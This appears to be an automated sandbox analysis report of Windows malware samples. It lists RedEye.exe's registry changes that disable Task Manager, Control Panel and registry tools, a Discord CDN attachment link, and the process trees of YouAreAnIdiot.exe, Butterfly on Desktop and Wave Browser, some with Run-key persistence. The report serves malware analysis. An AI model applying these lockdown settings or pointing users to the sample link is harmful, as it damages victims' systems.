Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" | RedEye.exe
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | RedEye.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" | RedEye.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer | RedEye.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1" | RedEye.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | RedEye.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "4" | RedEye.exe
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | RedEye.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1214735818472558646/1270183447918415902/robloxapp-20240802-1831583.wmv?ex=66b2c604&is=66b17484&hm=55b47e3987876be3720559b84781030d4a7f07fe97e2f75d58130ab55a74205c&1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3280
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd9bce46f8,0x7ffd9bce4708,0x7ffd9bce47182⤵PID:5048
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:22⤵PID:2580
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2548 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2976
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:82⤵PID:2496
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:12⤵PID:3864
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:12⤵PID:1988
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 /prefetch:82⤵PID:1248
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4032
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:12⤵PID:372
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:12⤵PID:1692
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5192 /prefetch:82⤵PID:4468
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:12⤵PID:1280
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6032 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3104
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:12⤵PID:4844
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:12⤵PID:1840
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:12⤵PID:3828
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:12⤵PID:3492
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:12⤵PID:1248
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:12⤵PID:3104
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:12⤵PID:2164
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5240 /prefetch:82⤵PID:1552
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5880 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1936
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:12⤵PID:4300
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:12⤵PID:2676
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:12⤵PID:4552
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:12⤵PID:3360
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6780 /prefetch:82⤵PID:2456
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5780 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4572
C:\Users\Admin\Downloads\YouAreAnIdiot.exe"C:\Users\Admin\Downloads\YouAreAnIdiot.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:712
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 712 -s 13683⤵
- Program crash
PID:3708
C:\Users\Admin\Downloads\YouAreAnIdiot.exe"C:\Users\Admin\Downloads\YouAreAnIdiot.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1684
C:\Users\Admin\Downloads\YouAreAnIdiot.exe"C:\Users\Admin\Downloads\YouAreAnIdiot.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3248
C:\Users\Admin\Downloads\YouAreAnIdiot.exe"C:\Users\Admin\Downloads\YouAreAnIdiot.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4532
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 11723⤵
- Program crash
PID:5052
C:\Users\Admin\Downloads\YouAreAnIdiot.exe"C:\Users\Admin\Downloads\YouAreAnIdiot.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2216
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 11723⤵
- Program crash
PID:4824
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:12⤵PID:3984
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6428 /prefetch:82⤵PID:912
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7024 /prefetch:82⤵PID:628
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6884 /prefetch:12⤵PID:4172
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6932 /prefetch:12⤵PID:712
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7040 /prefetch:12⤵PID:1364
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7048 /prefetch:12⤵PID:2360
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2816 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4620
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:12⤵PID:556
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8028 /prefetch:82⤵PID:408
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5088
C:\Users\Admin\Downloads\butterflyondesktop.exe"C:\Users\Admin\Downloads\butterflyondesktop.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2284
C:\Users\Admin\AppData\Local\Temp\is-TVQIS.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-TVQIS.tmp\butterflyondesktop.tmp" /SL5="$E0046,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3780
C:\Users\Admin\Downloads\butterflyondesktop.exe"C:\Users\Admin\Downloads\butterflyondesktop.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2456
C:\Users\Admin\AppData\Local\Temp\is-03UJG.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-03UJG.tmp\butterflyondesktop.tmp" /SL5="$40218,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1796
C:\Users\Admin\Downloads\butterflyondesktop.exe"C:\Users\Admin\Downloads\butterflyondesktop.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2320
C:\Users\Admin\AppData\Local\Temp\is-SG6AK.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-SG6AK.tmp\butterflyondesktop.tmp" /SL5="$30208,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4484
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:5084
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html4⤵PID:3368
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd9bce46f8,0x7ffd9bce4708,0x7ffd9bce47185⤵PID:2428
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:12⤵PID:232
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7876 /prefetch:12⤵PID:4608
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6428 /prefetch:12⤵PID:3360
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8288 /prefetch:12⤵PID:3712
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8428 /prefetch:12⤵PID:3984
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7932 /prefetch:12⤵PID:3792
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8548 /prefetch:12⤵PID:4632
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8308 /prefetch:12⤵PID:1520
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8016 /prefetch:12⤵PID:4500
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7820 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4160
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7824 /prefetch:82⤵PID:3292
C:\Users\Admin\Downloads\Wave Browser.exe"C:\Users\Admin\Downloads\Wave Browser.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1228
C:\Users\Admin\Downloads\Wave Browser.exe"C:\Users\Admin\Downloads\Wave Browser.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4552
C:\Users\Admin\Downloads\Wave Browser.exe"C:\Users\Admin\Downloads\Wave Browser.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2664
C:\Users\Admin\AppData\Local\Temp\Wave\SWUpdaterSetup.exe"C:\Users\Admin\AppData\Local\Temp\Wave\SWUpdaterSetup.exe" /install "bundlename=WaveBrowser&appguid={EB149AD2-CE4E-4F51-B7FC-A149FAA4CCAF}&appname=WaveBrowser&needsadmin=False&lang=en&usagestats=1&installdataindex=1"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:3216
